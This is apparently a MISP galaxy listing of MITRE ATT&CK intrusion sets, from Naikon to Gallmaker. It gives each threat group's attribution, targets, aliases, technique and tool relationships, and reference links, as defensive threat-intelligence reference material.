[Naikon](https://attack.mitre.org/groups/G0019) is assessed to be a state-sponsored cyber espionage group attributed to the Chinese People’s Liberation Army’s (PLA) Chengdu Military Region Second Technical Reconnaissance Bureau (Military Unit Cover Designator 78020).(Citation: CameraShy) Active since at least 2010, [Naikon](https://attack.mitre.org/groups/G0019) has primarily conducted operations against government, military, and civil organizations in Southeast Asia, as well as against international bodies such as the United Nations Development Programme (UNDP) and the Association of Southeast Asian Nations (ASEAN).(Citation: CameraShy)(Citation: Baumgartner Naikon 2015)

While [Naikon](https://attack.mitre.org/groups/G0019) shares some characteristics with [APT30](https://attack.mitre.org/groups/G0013), the two groups do not appear to be exact matches.(Citation: Baumgartner Golovkin Naikon 2015)

The tag is: misp-galaxy:mitre-intrusion-set="Naikon - G0019"

Naikon - G0019 is also known as:

  • Naikon

Naikon - G0019 has relationships with:

  • similar: misp-galaxy:threat-actor="Naikon" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="APT30 - G0013" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-tool="netsh - S0108" with estimative-language:likelihood-probability="almost-certain"

Table 7094. Table References

Links

http://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf

https://attack.mitre.org/groups/G0019

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf

https://securelist.com/the-naikon-apt/69953/

Silence - G0091

[Silence](https://attack.mitre.org/groups/G0091) is a financially motivated threat actor targeting financial institutions in different countries. The group was first seen in June 2016. Their main targets reside in Russia, Ukraine, Belarus, Azerbaijan, Poland and Kazakhstan. They compromised various banking systems, including the Russian Central Bank’s Automated Workstation Client, ATMs, and card processing.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)

The tag is: misp-galaxy:mitre-intrusion-set="Silence - G0091"

Silence - G0091 is also known as:

  • Silence

  • Whisper Spider

Table 7095. Table References

Links

https://attack.mitre.org/groups/G0091

https://cyberforensicator.com/2019/01/20/silence-dissecting-malicious-chm-files-and-performing-forensic-analysis/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://securelist.com/the-silence/83009/

APT3 - G0022

[APT3](https://attack.mitre.org/groups/G0022) is a China-based threat group that researchers have attributed to China’s Ministry of State Security.(Citation: FireEye Clandestine Wolf)(Citation: Recorded Future APT3 May 2017) This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.(Citation: FireEye Clandestine Wolf)(Citation: FireEye Operation Double Tap) As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong.(Citation: Symantec Buckeye)

In 2017, MITRE developed an APT3 Adversary Emulation Plan.(Citation: APT3 Adversary Emulation Plan)

The tag is: misp-galaxy:mitre-intrusion-set="APT3 - G0022"

APT3 - G0022 is also known as:

  • APT3

  • Gothic Panda

  • Pirpi

  • UPS Team

  • Buckeye

  • Threat Group-0110

  • TG-0110

APT3 - G0022 has relationships with:

  • similar: misp-galaxy:threat-actor="APT3" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="PlugX - S0013" with estimative-language:likelihood-probability="almost-certain"

Table 7096. Table References

Links

http://pwc.blogs.com/cyber_security_updates/2015/07/pirpi-scanbox.html

http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong

https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf

https://attack.mitre.org/groups/G0022

https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html

https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html

https://www.recordedfuture.com/chinese-mss-behind-apt3/

APT38 - G0082

[APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017)

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.

The tag is: misp-galaxy:mitre-intrusion-set="APT38 - G0082"

APT38 - G0082 is also known as:

  • APT38

  • NICKEL GLADSTONE

  • BeagleBoyz

  • Bluenoroff

  • Stardust Chollima

APT38 - G0082 has relationships with:

  • similar: misp-galaxy:360net-threat-actor="Lazarus - APT-C-26" with estimative-language:likelihood-probability="likely"

Table 7097. Table References

Links

https://attack.mitre.org/groups/G0082

https://content.fireeye.com/apt/rpt-apt38

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://securelist.com/lazarus-under-the-hood/77908/

https://us-cert.cisa.gov/ncas/alerts/aa20-239a

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-april-stardust-chollima/

https://www.justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and

https://www.secureworks.com/research/threat-profiles/nickel-gladstone

TA459 - G0062

[TA459](https://attack.mitre.org/groups/G0062) is a threat group believed to operate out of China that has targeted countries including Russia, Belarus, Mongolia, and others. (Citation: Proofpoint TA459 April 2017)

The tag is: misp-galaxy:mitre-intrusion-set="TA459 - G0062"

TA459 - G0062 is also known as:

  • TA459

TA459 - G0062 has relationships with:

  • similar: misp-galaxy:threat-actor="TA459" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="PlugX - S0013" with estimative-language:likelihood-probability="almost-certain"

Table 7098. Table References

Links

https://attack.mitre.org/groups/G0062

https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts

MONSOON - G0042

The tag is: misp-galaxy:mitre-intrusion-set="MONSOON - G0042"

MONSOON - G0042 has relationships with:

  • similar: misp-galaxy:threat-actor="QUILTED TIGER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Patchwork - G0040" with estimative-language:likelihood-probability="likely"

Table 7099. Table References

Links

https://attack.mitre.org/groups/G0042

CopyKittens - G0052

[CopyKittens](https://attack.mitre.org/groups/G0052) is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip.(Citation: ClearSky CopyKittens March 2017)(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)

The tag is: misp-galaxy:mitre-intrusion-set="CopyKittens - G0052"

CopyKittens - G0052 is also known as:

  • CopyKittens

CopyKittens - G0052 has relationships with:

  • similar: misp-galaxy:threat-actor="CopyKittens" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1086" with estimative-language:likelihood-probability="almost-certain"

Table 7100. Table References

Links

http://www.clearskysec.com/copykitten-jpost/

http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf

https://attack.mitre.org/groups/G0052

https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf

Honeybee - G0072

[Honeybee](https://attack.mitre.org/groups/G0072) is a campaign led by an unknown actor that targets humanitarian aid organizations and has been active in Vietnam, Singapore, Argentina, Japan, Indonesia, and Canada. It has been an active operation since August of 2017 and as recently as February 2018. (Citation: McAfee Honeybee)

The tag is: misp-galaxy:mitre-intrusion-set="Honeybee - G0072"

Honeybee - G0072 is also known as:

  • Honeybee

Table 7101. Table References

Links

https://attack.mitre.org/groups/G0072

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/

APT33 - G0064

[APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)

The tag is: misp-galaxy:mitre-intrusion-set="APT33 - G0064"

APT33 - G0064 is also known as:

  • APT33

  • HOLMIUM

  • Elfin

APT33 - G0064 has relationships with:

  • similar: misp-galaxy:threat-actor="APT33" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1192" with estimative-language:likelihood-probability="almost-certain"

Table 7102. Table References

Links

https://attack.mitre.org/groups/G0064

https://www.brighttalk.com/webcast/10703/275683

https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/

https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage

APT34 - G0057

APT34 is an Iranian cyber espionage group that has been active since at least 2014. The group has targeted a variety of industries, including financial, government, energy, chemical, and telecommunications, and has largely focused its operations within the Middle East. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. APT34 loosely aligns with public reporting related to OilRig, but may not wholly align due to companies tracking threat groups in different ways. (Citation: FireEye APT34 Dec 2017)

The tag is: misp-galaxy:mitre-intrusion-set="APT34 - G0057"

APT34 - G0057 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1086" with estimative-language:likelihood-probability="almost-certain"

Table 7103. Table References

Links

https://attack.mitre.org/groups/G0057

Group5 - G0043

[Group5](https://attack.mitre.org/groups/G0043) is a threat group with a suspected Iranian nexus, though this attribution is not definite. The group has targeted individuals connected to the Syrian opposition via spearphishing and watering holes, normally using Syrian and Iranian themes. [Group5](https://attack.mitre.org/groups/G0043) has used two commonly available remote access tools (RATs), [njRAT](https://attack.mitre.org/software/S0385) and [NanoCore](https://attack.mitre.org/software/S0336), as well as an Android RAT, DroidJack. (Citation: Citizen Lab Group5)

The tag is: misp-galaxy:mitre-intrusion-set="Group5 - G0043"

Group5 - G0043 is also known as:

  • Group5

Group5 - G0043 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 7104. Table References

Links

https://attack.mitre.org/groups/G0043

https://citizenlab.ca/2016/08/group5-syria/

FIN5 - G0053

[FIN5](https://attack.mitre.org/groups/G0053) is a financially motivated threat group that has targeted personally identifiable information and payment card information. The group has been active since at least 2008 and has targeted the restaurant, gaming, and hotel industries. The group is made up of actors who likely speak Russian. (Citation: FireEye Respond Webinar July 2017) (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)

The tag is: misp-galaxy:mitre-intrusion-set="FIN5 - G0053"

FIN5 - G0053 is also known as:

  • FIN5

FIN5 - G0053 has relationships with:

  • uses: misp-galaxy:mitre-malware="FLIPSIDE - S0173" with estimative-language:likelihood-probability="almost-certain"

Table 7105. Table References

Links

https://attack.mitre.org/groups/G0053

https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?

https://www.youtube.com/watch?v=fevGZs0EQu8

https://www2.fireeye.com/WBNR-Are-you-ready-to-respond.html

Dragonfly - G0035

[Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been attributed to Russia’s Federal Security Service (FSB) Center 16.(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) Active since at least 2010, [Dragonfly](https://attack.mitre.org/groups/G0035) has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Gigamon Berserk Bear October 2021)(Citation: CISA AA20-296A Berserk Bear December 2020)(Citation: Symantec Dragonfly 2.0 October 2017)

The tag is: misp-galaxy:mitre-intrusion-set="Dragonfly - G0035"

Dragonfly - G0035 is also known as:

  • Dragonfly

  • TEMP.Isotope

  • DYMALLOY

  • Berserk Bear

  • TG-4192

  • Crouching Yeti

  • IRON LIBERTY

  • Energetic Bear

Dragonfly - G0035 has relationships with:

  • similar: misp-galaxy:threat-actor="ENERGETIC BEAR" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="Trojan.Karagany - S0094" with estimative-language:likelihood-probability="almost-certain"

Table 7106. Table References

Links

http://fortune.com/2017/09/06/hack-energy-grid-symantec/

https://attack.mitre.org/groups/G0035

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks

https://vblocalhost.com/uploads/VB2021-Slowik.pdf

https://www.cisa.gov/uscert/ncas/alerts/aa20-296a#revisions

https://www.dragos.com/threat/dymalloy/

https://www.gov.uk/government/publications/russias-fsb-malign-cyber-activity-factsheet/russias-fsb-malign-activity-factsheet

https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical

https://www.mandiant.com/resources/ukraine-crisis-cyber-threats

https://www.secureworks.com/research/mcmd-malware-analysis

https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector

https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector

APT37 - G0067

[APT37](https://attack.mitre.org/groups/G0067) is a North Korean state-sponsored cyber espionage group that has been active since at least 2012. The group has targeted victims primarily in South Korea, but also in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. [APT37](https://attack.mitre.org/groups/G0067) has also been linked to the following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are you Happy?, FreeMilk, North Korean Human Rights, and Evil New Year 2018.(Citation: FireEye APT37 Feb 2018)(Citation: Securelist ScarCruft Jun 2016)(Citation: Talos Group123)

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.

The tag is: misp-galaxy:mitre-intrusion-set="APT37 - G0067"

APT37 - G0067 is also known as:

  • APT37

  • InkySquid

  • ScarCruft

  • Reaper

  • Group123

  • TEMP.Reaper

  • Ricochet Chollima

APT37 - G0067 has relationships with:

  • similar: misp-galaxy:threat-actor="APT37" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="ScarCruft - APT-C-28" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"

Table 7107. Table References

Links

https://attack.mitre.org/groups/G0067

https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html

https://securelist.com/operation-daybreak/75100/

https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/

https://www.crowdstrike.com/adversaries/ricochet-chollima/

https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

FIN6 - G0037

[FIN6](https://attack.mitre.org/groups/G0037) is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)

The tag is: misp-galaxy:mitre-intrusion-set="FIN6 - G0037"

FIN6 - G0037 is also known as:

  • FIN6

  • Magecart Group 6

  • ITG08

  • Skeleton Spider

FIN6 - G0037 has relationships with:

  • similar: misp-galaxy:threat-actor="FIN6" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1060" with estimative-language:likelihood-probability="almost-certain"

Table 7108. Table References

Links

https://attack.mitre.org/groups/G0037

https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report

https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/

https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/

https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf

GCMAN - G0036

[GCMAN](https://attack.mitre.org/groups/G0036) is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services. (Citation: Securelist GCMAN)

The tag is: misp-galaxy:mitre-intrusion-set="GCMAN - G0036"

GCMAN - G0036 is also known as:

  • GCMAN

GCMAN - G0036 has relationships with:

  • similar: misp-galaxy:threat-actor="GCMAN" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Remote Services - T1021" with estimative-language:likelihood-probability="almost-certain"

Table 7109. Table References

Links

https://attack.mitre.org/groups/G0036

https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/

BlackOasis - G0063

[BlackOasis](https://attack.mitre.org/groups/G0063) is a Middle Eastern threat group that is believed to be a customer of Gamma Group. The group has shown interest in prominent figures in the United Nations, as well as opposition bloggers, activists, regional news correspondents, and think tanks. (Citation: Securelist BlackOasis Oct 2017) (Citation: Securelist APT Trends Q2 2017) A group known by Microsoft as [NEODYMIUM](https://attack.mitre.org/groups/G0055) is reportedly associated closely with [BlackOasis](https://attack.mitre.org/groups/G0063) operations, but evidence that the group names are aliases has not been identified. (Citation: CyberScoop BlackOasis Oct 2017)

The tag is: misp-galaxy:mitre-intrusion-set="BlackOasis - G0063"

BlackOasis - G0063 is also known as:

  • BlackOasis

BlackOasis - G0063 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 7110. Table References

Links

https://attack.mitre.org/groups/G0063

https://securelist.com/apt-trends-report-q2-2017/79332/

https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/

https://www.cyberscoop.com/middle-eastern-hacking-group-using-finfisher-malware-conduct-international-espionage/

APT39 - G0087

[APT39](https://attack.mitre.org/groups/G0087) is one of several names for cyber espionage activity conducted by the Iranian Ministry of Intelligence and Security (MOIS) through the front company Rana Intelligence Computing since at least 2014. [APT39](https://attack.mitre.org/groups/G0087) has primarily targeted the travel, hospitality, academic, and telecommunications industries in Iran and across Asia, Africa, Europe, and North America to track individuals and entities considered to be a threat by the MOIS.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020)

The tag is: misp-galaxy:mitre-intrusion-set="APT39 - G0087"

APT39 - G0087 is also known as:

  • APT39

  • ITG07

  • Chafer

  • Remix Kitten

Table 7111. Table References

Links

https://attack.mitre.org/groups/G0087

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://home.treasury.gov/news/press-releases/sm1127

https://www.darkreading.com/attacks-breaches/iran-ups-its-traditional-cyber-espionage-tradecraft/d/d-id/1333764

https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html

https://www.iranwatch.org/sites/default/files/public-intelligence-alert.pdf

https://www.justice.gov/opa/pr/department-justice-and-partner-departments-and-agencies-conduct-coordinated-actions-disrupt

https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets

SilverTerrier - G0083

[SilverTerrier](https://attack.mitre.org/groups/G0083) is a Nigerian threat group that has been seen active since 2014. [SilverTerrier](https://attack.mitre.org/groups/G0083) mainly targets organizations in high technology, higher education, and manufacturing.(Citation: Unit42 SilverTerrier 2018)(Citation: Unit42 SilverTerrier 2016)

The tag is: misp-galaxy:mitre-intrusion-set="SilverTerrier - G0083"

SilverTerrier - G0083 is also known as:

  • SilverTerrier

Table 7112. Table References

Links

https://attack.mitre.org/groups/G0083

https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/unit42-silverterrier-rise-of-nigerian-business-email-compromise

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/silverterrier-next-evolution-in-nigerian-cybercrime.pdf

GALLIUM - G0093

[GALLIUM](https://attack.mitre.org/groups/G0093) is a cyberespionage group that has been active since at least 2012, primarily targeting telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam. Security researchers have identified [GALLIUM](https://attack.mitre.org/groups/G0093) as a likely Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)(Citation: Unit 42 PingPull Jun 2022)

The tag is: misp-galaxy:mitre-intrusion-set="GALLIUM - G0093"

GALLIUM - G0093 is also known as:

  • GALLIUM

  • Operation Soft Cell

Table 7113. Table References

Links

https://attack.mitre.org/groups/G0093

https://unit42.paloaltonetworks.com/pingpull-gallium/

https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers

https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/

Suckfly - G0039

[Suckfly](https://attack.mitre.org/groups/G0039) is a China-based threat group that has been active since at least 2014. (Citation: Symantec Suckfly March 2016)

The tag is: misp-galaxy:mitre-intrusion-set="Suckfly - G0039"

Suckfly - G0039 is also known as:

  • Suckfly

Suckfly - G0039 has relationships with:

  • similar: misp-galaxy:threat-actor="APT22" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1116" with estimative-language:likelihood-probability="almost-certain"

Table 7114. Table References

Links

http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks

http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates

https://attack.mitre.org/groups/G0039

FIN4 - G0085

[FIN4](https://attack.mitre.org/groups/G0085) is a financially-motivated threat group that has targeted confidential information related to the public financial market, particularly regarding healthcare and pharmaceutical companies, since at least 2013.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye FIN4 Stealing Insider NOV 2014) [FIN4](https://attack.mitre.org/groups/G0085) is unique in that they do not infect victims with typical persistent malware, but rather they focus on capturing credentials authorized to access email and other non-public correspondence.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)

The tag is: misp-galaxy:mitre-intrusion-set="FIN4 - G0085"

FIN4 - G0085 is also known as:

  • FIN4

Table 7115. Table References

Links

https://attack.mitre.org/groups/G0085

https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html

https://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf

https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html

menuPass - G0045

[menuPass](https://attack.mitre.org/groups/G0045) is a threat group that has been active since at least 2006. Individual members of [menuPass](https://attack.mitre.org/groups/G0045) are known to have acted in association with the Chinese Ministry of State Security’s (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company.(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)

[menuPass](https://attack.mitre.org/groups/G0045) has targeted healthcare, defense, aerospace, finance, maritime, biotechnology, energy, and government sectors globally, with an emphasis on Japanese organizations. In 2016 and 2017, the group is known to have targeted managed IT service providers (MSPs), manufacturing and mining companies, and a university.(Citation: Palo Alto menuPass Feb 2017)(Citation: Crowdstrike CrowdCast Oct 2013)(Citation: FireEye Poison Ivy)(Citation: PWC Cloud Hopper April 2017)(Citation: FireEye APT10 April 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)

The tag is: misp-galaxy:mitre-intrusion-set="menuPass - G0045"

menuPass - G0045 is also known as:

  • menuPass

  • Cicada

  • POTASSIUM

  • Stone Panda

  • APT10

  • Red Apollo

  • CVNX

  • HOGFISH

menuPass - G0045 has relationships with:

  • similar: misp-galaxy:threat-actor="APT10" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 7116. Table References

Links

http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/

http://web.archive.org/web/20220810112638/https:/www.accenture.com/t20180423T055005Z_w/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf

https://attack.mitre.org/groups/G0045

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage

https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf

https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html

https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf

https://www.justice.gov/opa/page/file/1122671/download

https://www.justice.gov/opa/pr/two-chinese-hackers-associated-ministry-state-security-charged-global-computer-intrusion

https://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem

Sowbug - G0054

[Sowbug](https://attack.mitre.org/groups/G0054) is a threat group that has conducted targeted attacks against organizations in South America and Southeast Asia, particularly government entities, since at least 2015. (Citation: Symantec Sowbug Nov 2017)

The tag is: misp-galaxy:mitre-intrusion-set="Sowbug - G0054"

Sowbug - G0054 is also known as:

  • Sowbug

Sowbug - G0054 has relationships with:

  • similar: misp-galaxy:threat-actor="Sowbug" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1056" with estimative-language:likelihood-probability="almost-certain"

Table 7117. Table References

Links

https://attack.mitre.org/groups/G0054

https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments

FIN7 - G0046

[FIN7](https://attack.mitre.org/groups/G0046) is a financially-motivated threat group that has been active since 2013. [FIN7](https://attack.mitre.org/groups/G0046) has primarily targeted the retail, restaurant, hospitality, software, consulting, financial services, medical equipment, cloud services, media, food and beverage, transportation, and utilities industries in the U.S. A portion of [FIN7](https://attack.mitre.org/groups/G0046) was run out of a front company called Combi Security and often used point-of-sale malware for targeting efforts. Since 2020, [FIN7](https://attack.mitre.org/groups/G0046) shifted operations to a big game hunting (BGH) approach including use of [REvil](https://attack.mitre.org/software/S0496) ransomware and their own Ransomware as a Service (RaaS), Darkside. FIN7 may be linked to the [Carbanak](https://attack.mitre.org/groups/G0008) Group, but there appears to be several groups using [Carbanak](https://attack.mitre.org/software/S0030) malware and are therefore tracked separately.(Citation: FireEye FIN7 March 2017)(Citation: FireEye FIN7 April 2017)(Citation: FireEye CARBANAK June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: CrowdStrike Carbon Spider August 2021)(Citation: Mandiant FIN7 Apr 2022)

The tag is: misp-galaxy:mitre-intrusion-set="FIN7 - G0046"

FIN7 - G0046 is also known as:

  • FIN7

  • GOLD NIAGARA

  • ITG14

  • Carbon Spider

FIN7 - G0046 has relationships with:

  • similar: misp-galaxy:threat-actor="FIN7" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Carbanak - G0008" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

Table 7118. Table References

Links

http://blog.morphisec.com/fin7-attacks-restaurant-industry

https://attack.mitre.org/groups/G0046

https://securityintelligence.com/posts/ransomware-2020-attack-trends-new-techniques-affecting-organizations-worldwide/

https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html

https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/

https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html

https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html

https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html

https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html

https://www.mandiant.com/resources/evolution-of-fin7

https://www.secureworks.com/research/threat-profiles/gold-niagara

Gallmaker - G0084

[Gallmaker](https://attack.mitre.org/groups/G0084) is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017. The group has mainly targeted victims in the defense, military, and government sectors.(Citation: Symantec Gallmaker Oct 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Gallmaker - G0084"

